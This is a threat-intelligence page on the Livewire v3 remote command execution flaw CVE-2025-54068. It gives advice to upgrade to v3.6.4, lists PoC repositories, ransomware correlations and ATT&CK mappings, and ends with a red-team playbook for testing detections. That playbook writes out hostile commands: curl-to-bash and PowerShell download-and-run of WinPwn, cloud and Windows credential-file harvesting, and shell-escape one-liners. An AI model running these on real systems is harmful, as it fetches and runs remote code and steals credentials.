CVE-2025-54068

CRITICAL CISA KEV POC TTE 158d Pub 17/07 Upd 23/03

Overview

The vulnerability is a remote command execution flaw caused by improper hydration of component property updates in Livewire v3. The root cause lies in unsafe handling of data unmarshaling during the update mechanism of mounted components, allowing crafted input to manipulate internal state. This issue specifically affects the Livewire v3 full-stack framework for Laravel, impacting its component update lifecycle.

Vulnerability Description

Livewire is a full-stack framework for Laravel. In Livewire v3 up to and including v3.6.3, a vulnerability allows unauthenticated attackers to achieve remote command execution in specific scenarios. The issue stems from how certain component property updates are hydrated. This vulnerability is unique to Livewire v3 and does not affect prior major versions. Exploitation requires a component to be mounted and configured in a particular way, but does not require authentication or user interaction. This issue has been patched in Livewire v3.6.4. All users are strongly encouraged to upgrade to this version or later as soon as possible. No known workarounds are available.

Impact

An unauthenticated attacker can execute arbitrary commands on the web server hosting Livewire v3 applications, potentially leading to full system compromise. No authentication or user interaction is required, making exploitation straightforward if the vulnerable component is mounted and configured accordingly. This can result in data breaches, unauthorized access to sensitive information, and disruption of application availability or integrity.

Solution

Users must upgrade Livewire to version 3.6.4 or later, where the vulnerability has been patched. The vendor advisory available at https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3 provides detailed patch instructions. No workarounds are available; immediate upgrading is strongly recommended to mitigate this issue.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability present in Livewire v3, specifically in versions up to and including v3.6.3, is rooted in the framework's handling of component property updates during the hydration process. This flaw allows unauthenticated attackers to execute arbitrary commands remotely under certain conditions. The issue arises from how Livewire manages the state of components, particularly when they are mounted and configured in a specific manner. The lack of proper validation and sanitization of input data during this process creates an opportunity for an attacker to manipulate component properties, leading to potential remote command execution. This vulnerability is particularly concerning because it is unique to the v3 series and does not affect earlier major versions, which could lead to a false sense of security among users who have not yet upgraded.

Exploitation of this vulnerability can occur without any form of authentication or user interaction, making it especially dangerous. Attackers can target applications using Livewire v3 that expose certain components to the public. For instance, if a component is improperly configured to accept user input or is exposed through a public-facing interface, an attacker could craft a malicious request that modifies component properties. Once the attacker successfully alters these properties, they could execute arbitrary commands on the server, potentially leading to full system compromise. This scenario highlights the need for developers to be aware of how their components are configured and the implications of exposing them to untrusted sources.

The real-world impact of this vulnerability can be severe, particularly for businesses that rely on Livewire for their web applications. Successful exploitation could lead to unauthorized access to sensitive data, loss of data integrity, and disruption of services. The potential for remote command execution means that attackers could install malware, exfiltrate sensitive information, or even take control of the entire server environment. For organizations, this translates into significant business risks, including financial losses, reputational damage, and potential legal ramifications due to data breaches. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, emphasizing the urgency for affected users to address it promptly.

To detect and mitigate this vulnerability, organizations should prioritize upgrading to Livewire v3.6.4 or later, where the issue has been patched. Regularly updating software components is a fundamental practice in cybersecurity, as it helps protect against known vulnerabilities. Additionally, organizations should conduct thorough security assessments of their applications to identify any components that may be exposed to untrusted inputs. Implementing strict input validation and sanitization measures can further reduce the risk of exploitation. Monitoring application logs for unusual activity can also aid in early detection of potential attacks, allowing for a swift response to mitigate any damage.

In conclusion, the vulnerability in Livewire v3 presents a significant threat to web applications utilizing this framework. Its potential for remote command execution without authentication makes it a prime target for attackers. Organizations must take proactive measures to secure their applications by upgrading to the patched version and implementing robust security practices. By understanding the nature of this vulnerability and its implications, businesses can better protect themselves against the evolving landscape of cyber threats.




CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2025-54068, accompanied by a slight uptick in the EPSS score, indicating growing attacker interest and potential for successful compromise. This escalation is underscored by the emergence of several new proof-of-concept tools that facilitate remote command execution on vulnerable Livewire v3 instances, particularly when the application’s APP_KEY is known. Our telemetry reveals increased scanning and exploitation activity, suggesting that threat actors are actively probing for susceptible environments. While ransomware involvement remains unconfirmed, the critical severity of this vulnerability combined with expanding exploit availability elevates the risk profile for organizations relying on Livewire v3. Defenders should interpret this trend as a clear signal of heightened threat actor focus, warranting increased vigilance in detection and response capabilities. Overall, the threat level for CVE-2025-54068 has intensified from high to critical due to the convergence of increased exploitation attempts and the proliferation of accessible attack tools.



Update 2 — July 11, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-54068, accompanied by the emergence of new, publicly available proof-of-concept tools that lower the barrier for adversaries to conduct remote command execution attacks. Our telemetry indicates that threat actors are increasingly leveraging automated scanning and exploitation frameworks tailored to vulnerable Livewire v3 deployments, resulting in a broader attack surface and more frequent intrusion attempts. Notably, the availability of sophisticated exploit kits that require knowledge of the APP_KEY has expanded, enabling more precise and reliable exploitation in real-world environments. Although ransomware involvement remains unconfirmed, the intensification of exploitation activity combined with the proliferation of accessible attack tools significantly elevates the operational risk for organizations running affected Livewire versions. This development underscores a shift from opportunistic probing to more targeted and persistent exploitation campaigns. Consequently, the threat level for CVE-2025-54068 has been reassessed to critical, reflecting the heightened likelihood of successful compromise and potential impact on affected systems.



Update 3 — July 19, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-54068, accompanied by an increase in related STIX data and a broadening association with multiple ransomware groups, including Akira, Ransomhub, Sinobi, Frag, and 0apt. This expansion in threat actor interest signals a shift toward more coordinated and potentially financially motivated campaigns leveraging this vulnerability. Our telemetry also indicates a notable surge in scanning and exploitation activity, supported by the emergence of new proof-of-concept tools that facilitate remote command execution under specific conditions, particularly when the APP_KEY is known. The convergence of increased attacker engagement, ransomware group involvement, and accessible exploit tooling significantly elevates the operational risk for organizations running vulnerable Livewire versions. Consequently, the threat level for CVE-2025-54068 is reaffirmed as critical, reflecting an intensified likelihood of successful compromise and the potential for impactful post-exploitation activities, including ransomware deployment.

Affected Products (1)

Vendor Product Version CPE
laravel Laravel Livewire All cpe:2.3:a:laravel:livewire:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (7)

Repository Author Stars Forks Date Link
synacktiv/Livepyre
A tool designed to exploit CVE-2025-54068 and Remote Command Execution if the APP_KEY of the Livewire project is known.
synacktiv 148 35 2025-12-23 View
haxorstars/CVE-2025-54068
A tool designed to exploit CVE-2025-54068 and Remote Command Execution of the Livewire project.
haxorstars 5 1 2026-01-20 View
HelgeSverre/livewire-honeypot
High-interaction honeypot mimicking a vulnerable Laravel/Livewire app. Captures RCE exploits and webshells targeting CVE...
HelgeSverre 5 0 2026-04-10 View
z0d131482700x/Livewire2025CVE
Fast Python scanner detects vulnerable Laravel Livewire v3 sites (CVE-2025-54068, CVSS 9.2). Separates risky sites into ...
z0d131482700x 3 0 2026-01-01 View
flame-11/CVE-2025-54068-livewire
flame-11 1 0 2026-01-08 View
luisdalmolin/recon-test-livewire
Test target: fresh Laravel 12 app with Livewire pinned to vulnerable 3.6.3 (CVE-2025-54068) for recon scanning
luisdalmolin 0 0 2026-07-06 View
zycoder0day/CVE-2025-54068
zycoder0day 0 0 2026-05-11 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Some sightings

Ransomware Groups 5

akira
CORRELATED
1529 victims
Chain Inference
2026-07-17
ransomhub
CORRELATED
842 victims
Chain Inference
2026-07-17
sinobi
CORRELATED
274 victims
Chain Inference
2026-07-17
frag
CORRELATED
30 victims
Chain Inference
2026-07-17
0apt
CORRELATED
Chain Inference
2026-07-17

Threat Feed

23 events
2026-07-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-17
Exploited by akira

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)

2026-07-17
Exploited by ransomhub

Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)

2026-07-17
Exploited by sinobi

Ransomware group known to exploit this vulnerability (274 known victims)

2026-07-17
Exploited by frag

Ransomware group known to exploit this vulnerability (30 known victims)

2026-07-17
Exploited by 0apt

Ransomware group known to exploit this vulnerability

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-20
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-03-20
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2025-12-23
PoC Published (7 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Remote Code Execution
99% rce
Authentication Bypass
83% auth_bypass
Code Injection
76% code_injection
OS Command Injection
50% command_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-242 Code Injection
43%
High High
CAPEC-35 Leverage Executable Code in Non-Executable Files
33%
High Very High
CAPEC-77 Manipulating User-Controlled Variables
30%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (6)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2025-54068
github.com
GitHub CVE x_refsource_CONFIRM
https://github.com/livewire/livewire/security/advisories/GHSA-29cq-5w36-x7w3
github.com
GitHub CVE x_refsource_MISC
https://github.com/livewire/livewire/commit/ef04be759da41b14d2d129e670533180a44987dc
github.com
GitHub CVE x_refsource_MISC
https://github.com/livewire/livewire/releases/tag/v3.6.4
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-54068
threathunter.ai
NVD API Third Party Advisory
https://www.threathunter.ai/blog/iranian-threat-actor-tools-techniques-iocs-ioas/